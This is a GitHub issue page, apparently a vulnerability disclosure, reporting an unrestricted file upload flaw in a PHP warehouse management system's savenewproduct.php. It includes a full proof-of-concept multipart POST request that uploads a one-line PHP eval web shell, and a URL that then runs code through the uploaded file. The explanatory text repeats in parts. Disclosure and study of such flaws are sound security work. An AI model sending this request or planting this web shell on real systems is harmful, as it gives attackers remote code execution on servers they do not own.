Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Upfile is a parameter for uploading pictures,
The upfile from POST is assigned to $upfile
Then let's look at lines 45-64 of the code
It can be seen that the uploaded files are stored in the upimages directory, and the file naming rules are 1.jpg, 2.jpg, and then add 1
POC:
POST /product/savenewproduct.php?flag=1 HTTP/1.1 Host: xxxx Content-Length: 1507 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://wmsvul.test Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://wmsvul.test/product/addproduct.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695 Connection: close ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="typeid" 0001 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="name" 123123123123 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="encode" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="barcode" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="size" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="unit" None ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="upperlimit" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="lowerlimit" 10 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="inprice" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="outprice" 123 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="MAX_FILE_SIZE" 2000000 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="upfile"; filename="POC.php" Content-Type: application/octet-stream <?php @eval($_GET['ace']);?> ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="jianjie" ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="submit" 添加 ------WebKitFormBoundaryONFXfH9gn2T6Gxal--
Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php
Then, we access the PHP file to execute the code
http://wmsvul.test/product/upimages/1.php?ace=phpinfo();
The text was updated successfully, but these errors were encountered:
No branches or pull requests
WMS has a file upload code execution vulnerability
Build environment: Apache 2.4.39; MySQL5.0.96; PHP5.3.29
1.in /src/product/addproduct.php,On lines 242-246 of the code
Upfile is a parameter for uploading pictures,
2.Then we come to savenewproduct.php
The upfile from POST is assigned to $upfile
Then let's look at lines 45-64 of the code
It can be seen that the uploaded files are stored in the upimages directory, and the file naming rules are 1.jpg, 2.jpg, and then add 1
3.Therefore, we can construct a poc to execute the file upload command
POC:
Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php
Then, we access the PHP file to execute the code
POC:
The text was updated successfully, but these errors were encountered: